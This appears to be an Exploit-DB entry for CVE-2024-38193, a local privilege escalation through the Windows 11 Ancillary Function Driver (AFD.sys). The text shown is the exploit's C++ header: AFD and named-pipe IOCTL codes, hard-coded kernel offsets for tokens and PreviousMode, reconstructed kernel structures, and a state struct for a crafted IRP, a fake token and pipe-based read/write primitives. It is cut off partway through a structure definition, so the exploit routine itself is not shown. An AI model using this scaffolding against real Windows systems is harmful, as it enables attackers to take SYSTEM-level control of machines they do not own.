Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

EDB-ID:

52284




Platform:

Windows

Date:

2025-05-09


# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193

#pragma once

#include "ntstatus.h"
#include "Windows.h"
#include <iostream>

#pragma comment(lib, "ntdll.lib")


#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"


#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE


typedef struct IO_STATUS_BLOCK
{
    union
    {
        DWORD Status;
        PVOID Pointer;
    };

    DWORD* Information;
};

//0x4 bytes (sizeof)
struct _SYSTEM_POWER_STATE_CONTEXT
{
    union
    {
        struct
        {
            ULONG Reserved1 : 8; //0x0
            ULONG TargetSystemState : 4; //0x0
            ULONG EffectiveSystemState : 4; //0x0
            ULONG CurrentSystemState : 4; //0x0
            ULONG IgnoreHibernationPath : 1; //0x0
            ULONG PseudoTransition : 1; //0x0
            ULONG KernelSoftReboot : 1; //0x0
            ULONG DirectedDripsTransition : 1; //0x0
            ULONG Reserved2 : 8; //0x0
        };
        ULONG ContextAsUlong; //0x0
    };
};

//0x4 bytes (sizeof)
union _POWER_STATE
{
    enum _SYSTEM_POWER_STATE SystemState; //0x0
    enum _DEVICE_POWER_STATE DeviceState; //0x0
};

//0x48 bytes (sizeof)
typedef struct _IO_STACK_LOCATION
{
    UCHAR MajorFunction; //0x0
    UCHAR MinorFunction; //0x1
    UCHAR Flags; //0x2
    UCHAR Control; //0x3
    union
    {
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT FileAttributes; //0x18
            USHORT ShareAccess; //0x1a
            ULONG EaLength; //0x20
        } Create; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
        } CreatePipe; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
        } CreateMailslot; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Read; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Write; //0x8
        struct
        {
            ULONG Length; //0x8
            struct _UNICODE_STRING* FileName; //0x10
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
            ULONG FileIndex; //0x20
        } QueryDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
        } NotifyDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS
DirectoryNotifyInformationClass; //0x18
        } NotifyDirectoryEx; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
        } QueryFile; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
            struct _FILE_OBJECT* FileObject; //0x18
            union
            {
                struct
                {
                    UCHAR ReplaceIfExists; //0x20
                    UCHAR AdvanceOnly; //0x21
                };
                ULONG ClusterCount; //0x20
                VOID* DeleteHandle; //0x20
            };
        } SetFile; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* EaList; //0x10
            ULONG EaListLength; //0x18
            ULONG EaIndex; //0x20
        } QueryEa; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetEa; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } QueryVolume; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } SetVolume; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG FsControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } FileSystemControl; //0x8
        struct
        {
            union _LARGE_INTEGER* Length; //0x8
            ULONG Key; //0x10
            union _LARGE_INTEGER ByteOffset; //0x18
        } LockControl; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG IoControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } DeviceIoControl; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            ULONG Length; //0x10
        } QuerySecurity; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            VOID* SecurityDescriptor; //0x10
        } SetSecurity; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } MountVolume; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } VerifyVolume; //0x8
        struct
        {
            struct _SCSI_REQUEST_BLOCK* Srb; //0x8
        } Scsi; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* StartSid; //0x10
            struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
            ULONG SidListLength; //0x20
        } QueryQuota; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetQuota; //0x8
        struct
        {
            enum _DEVICE_RELATION_TYPE Type; //0x8
        } QueryDeviceRelations; //0x8
        struct
        {
            struct _GUID* InterfaceType; //0x8
            USHORT Size; //0x10
            USHORT Version; //0x12
            struct _INTERFACE* Interface; //0x18
            VOID* InterfaceSpecificData; //0x20
        } QueryInterface; //0x8
        struct
        {
            struct _DEVICE_CAPABILITIES* Capabilities; //0x8
        } DeviceCapabilities; //0x8
        struct
        {
            struct _IO_RESOURCE_REQUIREMENTS_LIST*
IoResourceRequirementList; //0x8
        } FilterResourceRequirements; //0x8
        struct
        {
            ULONG WhichSpace; //0x8
            VOID* Buffer; //0x10
            ULONG Offset; //0x18
            ULONG Length; //0x20
        } ReadWriteConfig; //0x8
        struct
        {
            UCHAR Lock; //0x8
        } SetLock; //0x8
        struct
        {
            enum BUS_QUERY_ID_TYPE IdType; //0x8
        } QueryId; //0x8
        struct
        {
            enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
            ULONG LocaleId; //0x10
        } QueryDeviceText; //0x8
        struct
        {
            UCHAR InPath; //0x8
            UCHAR Reserved[3]; //0x9
            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
        } UsageNotification; //0x8
        struct
        {
            enum _SYSTEM_POWER_STATE PowerState; //0x8
        } WaitWake; //0x8
        struct
        {
            struct _POWER_SEQUENCE* PowerSequence; //0x8
        } PowerSequence; //0x8
        struct
        {
            union
            {
                ULONG SystemContext; //0x8
                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext;
//0x8
            };
            enum _POWER_STATE_TYPE Type; //0x10
            union _POWER_STATE State; //0x18
            enum POWER_ACTION ShutdownType; //0x20
        } Power; //0x8
        struct
        {
            struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
        } StartDevice; //0x8
        struct
        {
            ULONGLONG ProviderId; //0x8
            VOID* DataPath; //0x10
            ULONG BufferSize; //0x18
            VOID* Buffer; //0x20
        } WMI; //0x8
        struct
        {
            VOID* Argument1; //0x8
            VOID* Argument2; //0x10
            VOID* Argument3; //0x18
            VOID* Argument4; //0x20
        } Others; //0x8
    } Parameters; //0x8
    struct _DEVICE_OBJECT* DeviceObject; //0x28
    struct _FILE_OBJECT* FileObject; //0x30
    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP*
arg2, VOID* arg3); //0x38
    VOID* Context; //0x40
}IO_STACK_LOCATION;

//0x18 bytes (sizeof)
struct _KDEVICE_QUEUE_ENTRY
{
    struct _LIST_ENTRY DeviceListEntry; //0x0
    ULONG SortKey; //0x10
    UCHAR Inserted; //0x14
};

//0x58 bytes (sizeof)
struct _KAPC
{
    UCHAR Type; //0x0
    UCHAR AllFlags; //0x1
    UCHAR Size; //0x2
    UCHAR SpareByte1; //0x3
    ULONG SpareLong0; //0x4
    struct _KTHREAD* Thread; //0x8
    struct _LIST_ENTRY ApcListEntry; //0x10
    VOID* Reserved[3]; //0x20
    VOID* NormalContext; //0x38
    VOID* SystemArgument1; //0x40
    VOID* SystemArgument2; //0x48
    CHAR ApcStateIndex; //0x50
    CHAR ApcMode; //0x51
    UCHAR Inserted; //0x52
};
//0xd0 bytes (sizeof)
struct _IRP
{
    SHORT Type; //0x0
    USHORT Size; //0x2
    USHORT AllocationProcessorNumber; //0x4
    USHORT Reserved; //0x6
    struct _MDL* MdlAddress; //0x8
    ULONG Flags; //0x10
    union
    {
        struct _IRP* MasterIrp; //0x18
        LONG IrpCount; //0x18
        VOID* SystemBuffer; //0x18
    } AssociatedIrp; //0x18
    struct _LIST_ENTRY ThreadListEntry; //0x20
    struct IO_STATUS_BLOCK IoStatus; //0x30
    CHAR RequestorMode; //0x40
    UCHAR PendingReturned; //0x41
    CHAR StackCount; //0x42
    CHAR CurrentLocation; //0x43
    UCHAR Cancel; //0x44
    UCHAR CancelIrql; //0x45
    CHAR ApcEnvironment; //0x46
    UCHAR AllocationFlags; //0x47
    union
    {
        struct _IO_STATUS_BLOCK* UserIosb; //0x48
        VOID* IoRingContext; //0x48
    };
    struct _KEVENT* UserEvent; //0x50
    union
    {
        struct
        {
            union
            {
                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
arg2, ULONG arg3); //0x58
                VOID* IssuingProcess; //0x58
            };
            union
            {
                VOID* UserApcContext; //0x60
                struct _IORING_OBJECT* IoRing; //0x60
            };
        } AsynchronousParameters; //0x58
        union _LARGE_INTEGER AllocationSize; //0x58
    } Overlay; //0x58
    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
//0x68
    VOID* UserBuffer; //0x70
    union
    {
        struct
        {
            union
            {
                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
                VOID* DriverContext[4]; //0x78
            };
            struct _ETHREAD* Thread; //0x98
            CHAR* AuxiliaryBuffer; //0xa0
            struct _LIST_ENTRY ListEntry; //0xa8
            union
            {
                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                ULONG PacketType; //0xb8
            };
            struct _FILE_OBJECT* OriginalFileObject; //0xc0
            VOID* IrpExtension; //0xc8
        } Overlay; //0x78
        struct _KAPC Apc; //0x78
        VOID* CompletionKey; //0x78
    } Tail; //0x78
};
typedef struct _TA_ADDRESS
{
    USHORT AddressLength;
    USHORT AddressType;
    UCHAR Address[1];
}TA_ADDRESS;

typedef struct _TRANSPORT_ADDRESS
{
    LONG TAAddressCount;
    TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _SYSTEM_MODULE_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;

typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

typedef struct _AFD_CREATE_PACKET {
    //FILE_FULL_EA_INFORMATION
    ULONG NextEntryOffset;
    WORD Flags;
    UCHAR EaNameLength;
    USHORT EaValueLength;
    CHAR EaName[15];

    //AFD_CREATE_PACKET
    ULONG EndpointFlags;
    ULONG GroupID;
    ULONG AddressFamily;
    ULONG SocketType;
    ULONG Protocol;
    ULONG SizeOfTransportName;
    wchar_t TransportName[16];
    //UCHAR Unkown;
} AFD_CREATE_PACKET;

enum THREADINFOCLASS { ThreadImpersonationToken = 5 };

enum SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemExtendedHandleInformation = 64
};

typedef enum EVENT_TYPE {
    NotificationEvent,
    SynchronizationEvent
};

typedef struct _AFD_BIND_DATA {
    ULONG ShareType;
    SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;

typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
    __int64 UseSan;
    __int64 hNtSock1;
    __int64 Unknown;
    __int32 tmp6;
    WORD const_16;
    sockaddr_in bind;
};


typedef struct FAKE_DATA_ENTRY_QUEUE
{
    DWORD tmp;
    LIST_ENTRY nextQueue;
    __int64 unknown;
    PVOID security_client_context;
    __int64 unknown2;
    __int64 sizeOfData;
    char DATA[0x77FD0];
};

typedef struct _AFD_LISTEN_INFO {

    ULONG unknown;
    __int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;






typedef struct _SECURITY_CLIENT_CONTEXT
{
    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    unsigned __int8 DirectlyAccessClientToken;
    unsigned __int8 DirectAccessEffectiveOnly;
    unsigned __int8 ServerIsRemote;
    _TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;

struct __declspec(align(8)) _OWNER_ENTRY
{
    unsigned __int64 OwnerThread;
    DWORD ___u1;
};


//0x68 bytes (sizeof)
typedef struct _ERESOURCE
{
    struct _LIST_ENTRY SystemResourcesList; //0x0
    struct _OWNER_ENTRY* OwnerTable; //0x10
    SHORT ActiveCount; //0x18
    union
    {
        USHORT Flag; //0x1a
        struct
        {
            UCHAR ReservedLowFlags; //0x1a
            UCHAR WaiterPriority; //0x1b
        };
    };
    VOID* SharedWaiters; //0x20
    VOID* ExclusiveWaiters; //0x28
    struct _OWNER_ENTRY OwnerEntry; //0x30
    ULONG ActiveEntries; //0x40
    ULONG ContentionCount; //0x44
    ULONG NumberOfSharedWaiters; //0x48
    ULONG NumberOfExclusiveWaiters; //0x4c
    VOID* Reserved2; //0x50
    union
    {
        VOID* Address; //0x58
        ULONGLONG CreatorBackTraceIndex; //0x58
    };
    ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;

//0x8 bytes (sizeof)
typedef struct _EX_PUSH_LOCK
{
    union
    {
        struct
        {
            ULONGLONG Locked : 1; //0x0
            ULONGLONG Waiting : 1; //0x0
            ULONGLONG Waking : 1; //0x0
            ULONGLONG MultipleShared : 1; //0x0
            ULONGLONG Shared : 60; //0x0
        };
        ULONGLONG Value; //0x0
        VOID* Ptr; //0x0
    };
};

//0x10 bytes (sizeof)
typedef struct _SEP_CACHED_HANDLES_TABLE
{
    struct _EX_PUSH_LOCK Lock; //0x0
    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};

//0x8 bytes (sizeof)
typedef struct _EX_RUNDOWN_REF
{
    union
    {
        ULONGLONG Count; //0x0
        VOID* Ptr; //0x0
    };
};

//0x20 bytes (sizeof)
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
    struct _LIST_ENTRY RevocationInfos; //0x0
    struct _EX_PUSH_LOCK Lock; //0x10
    struct _EX_RUNDOWN_REF Rundown; //0x18
};

//0xc0 bytes (sizeof)
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
    struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
    struct _LUID LogonId; //0x8
    struct _LUID BuddyLogonId; //0x10
    LONGLONG ReferenceCount; //0x18
    ULONG Flags; //0x20
    struct _DEVICE_MAP* pDeviceMap; //0x28
    VOID* Token; //0x30
    struct _UNICODE_STRING AccountName; //0x38
    struct _UNICODE_STRING AuthorityName; //0x48
    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
    struct _EX_PUSH_LOCK SharedDataLock; //0x68
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
//0x70
    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
    struct _EJOB* ServerSilo; //0xa0
    struct _LUID SiblingAuthId; //0xa8
    struct _LIST_ENTRY TokenList; //0xb0
};
//0x30 bytes (sizeof)
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
    ULONG SecurityAttributeCount; //0x0
    struct _LIST_ENTRY SecurityAttributesList; //0x8
    ULONG WorkingSecurityAttributeCount; //0x18
    struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;

//0x20 bytes (sizeof)
typedef struct _SEP_SID_VALUES_BLOCK
{
    ULONG BlockLength; //0x0
    LONGLONG ReferenceCount; //0x8
    ULONG SidCount; //0x10
    ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;

//0x18 bytes (sizeof)
struct _SEP_TOKEN_PRIVILEGES
{
    ULONGLONG Present; //0x0
    ULONGLONG Enabled; //0x8
    ULONGLONG EnabledByDefault; //0x10
};

//0x1f bytes (sizeof)
struct _SEP_AUDIT_POLICY
{
    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
    UCHAR PolicySetStatus; //0x1e
};

//0x498 bytes (sizeof)
struct _TOKEN
{
    struct _TOKEN_SOURCE TokenSource; //0x0
    struct _LUID TokenId; //0x10
    struct _LUID AuthenticationId; //0x18
    struct _LUID ParentTokenId; //0x20
    union _LARGE_INTEGER ExpirationTime; //0x28
    struct _ERESOURCE* TokenLock; //0x30
    struct _LUID ModifiedId; //0x38
    struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
    struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
    ULONG SessionId; //0x78
    ULONG UserAndGroupCount; //0x7c
    ULONG RestrictedSidCount; //0x80
    ULONG VariableLength; //0x84
    ULONG DynamicCharged; //0x88
    ULONG DynamicAvailable; //0x8c
    ULONG DefaultOwnerIndex; //0x90
    struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
    struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
    VOID* PrimaryGroup; //0xa8
    ULONG* DynamicPart; //0xb0
    struct _ACL* DefaultDacl; //0xb8
    enum _TOKEN_TYPE TokenType; //0xc0
    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
    ULONG TokenFlags; //0xc8
    UCHAR TokenInUse; //0xcc
    ULONG IntegrityLevelIndex; //0xd0
    ULONG MandatoryPolicy; //0xd4
    void* LogonSession; //0xd8
    struct _LUID OriginatingLogonSession; //0xe0
    struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
pSecurityAttributes; //0x308
    VOID* Package; //0x310
    struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
    ULONG CapabilityCount; //0x320
    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
//0x448
    VOID* TrustLevelSid; //0x450
    struct _TOKEN* TrustLinkedToken; //0x458
    VOID* IntegrityLevelSidValue; //0x460
    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
    VOID* SessionObject; //0x488
    ULONGLONG VariablePart; //0x490
};

//0x38 bytes (sizeof)
struct _OBJECT_HEADER
{
    LONGLONG PointerCount; //0x0
    union
    {
        LONGLONG HandleCount; //0x8
        VOID* NextToFree; //0x8
    };
    struct _EX_PUSH_LOCK Lock; //0x10
    UCHAR TypeIndex; //0x18
    union
    {
        UCHAR TraceFlags; //0x19
        struct
        {
            UCHAR DbgRefTrace : 1; //0x19
            UCHAR DbgTracePermanent : 1; //0x19
        };
    };
    UCHAR InfoMask; //0x1a
    union
    {
        UCHAR Flags; //0x1b
        struct
        {
            UCHAR NewObject : 1; //0x1b
            UCHAR KernelObject : 1; //0x1b
            UCHAR KernelOnlyAccess : 1; //0x1b
            UCHAR ExclusiveObject : 1; //0x1b
            UCHAR PermanentObject : 1; //0x1b
            UCHAR DefaultSecurityQuota : 1; //0x1b
            UCHAR SingleHandleEntry : 1; //0x1b
            UCHAR DeletedInline : 1; //0x1b
        };
    };
    ULONG Reserved; //0x1c
    union
    {
        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
        VOID* QuotaBlockCharged; //0x20
    };
    VOID* SecurityDescriptor; //0x28
    struct _TOKEN Body; //0x30
};

struct mm {
    void* fake_data_entry;
    void* input;
    _IRP* crafted_irp;
    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
    void* p_mem_0x30;
    void* p_mem_0xD0_2;
    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
    ACL* VariablePartDefaultDacl;
    ACL* VariablePartDefaultDacl2;
    _ERESOURCE* TokenLock;
    void* PrimaryGroup;
    int sizeOfClientTokenAndObjectHeader;
    PSEP_SID_VALUES_BLOCK TokenSidValues;
    _SECURITY_CLIENT_CONTEXT* security_client_context;
    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
    _TOKEN* fakeToken;
    void *pipe_100_im_control_block;
    void* pipe_100_rw_control_block;
    void* p_mem_Pipe_hToPipe_1000_rw;
    void* p_mem_Pipe_hToPipe_1000_rw_2;
    HANDLE hPipeIM;
    HANDLE hPipeRW;
    HANDLE hFileIM;
    HANDLE hFileRW;
    HANDLE IncPrimitiveTOKEN;
    HANDLE RWPrimitiveTOKEN;
};

//0x18 bytes (sizeof)
struct _DISPATCHER_HEADER
{
    union
    {
        volatile LONG Lock; //0x0
        LONG LockNV; //0x0
        struct
        {
            UCHAR Type; //0x0
            UCHAR Signalling; //0x1
            UCHAR Size; //0x2
            UCHAR Reserved1; //0x3
        };
        struct
        {
            UCHAR TimerType; //0x0
            union
            {
                UCHAR TimerControlFlags; //0x1
                struct
                {
                    UCHAR Absolute : 1;